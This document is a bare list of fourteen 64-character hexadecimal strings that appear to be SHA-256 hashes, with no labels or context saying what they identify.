2db95cdfc19b90ce6ff474b4ad38be17d8b13e761ed02af7bbfe931f6d898e5b
4d17514e4c6ec3082d1321979a48ca6975a2fa1682a8e633a320fcff5e1a67c2
4f02151a607a8dbb3fa6a072004b866a46f454ded2fdc1dc5991007e1469b80d
616d2737341241c576565fcea99632728fdd464cbac63330453212350ef9ca19
6b2e28e6b2a7d6854b4d9941af6b9e334d53007f5486a533f5098d2552286f7c
6f2982e7236e094c6c01b4bf0e87505fa1ef9b809d6105e3f3e345353ef10cc2
b1def6a0eb345eefeac579d793c93a50b4a805ca38ff3cfaa2928ab6a5665a68
ba23bffc36efb30892b6cca21b76dbb4372852a40818abd1cd1e9f7df21bbecd
c64e9c818d03878f82b48c2e2778935a1acb3b867e31b1473e19e856cde37b6e
d3ca2d2c3e7e99c5035173b6f33d32ade7cc5753c13b28d4118b7136fc3baa32
daa6ac040a868f904cb1d84b65d47940ee44ef64f1e0cc154f266875ee56129e
dc0ebec5b637de73126525acd4bdf7e7e3790b26caea7cfcff90625ca8ccf7d1
e5be170a8935eecfcdf2d0a98457dcaa8354bf54e7de1bc20a913c685087fdb8
eaa566c7dddb8fb3085157f9f8ebb8879b41a1ec3904e7d49887d610c625c92e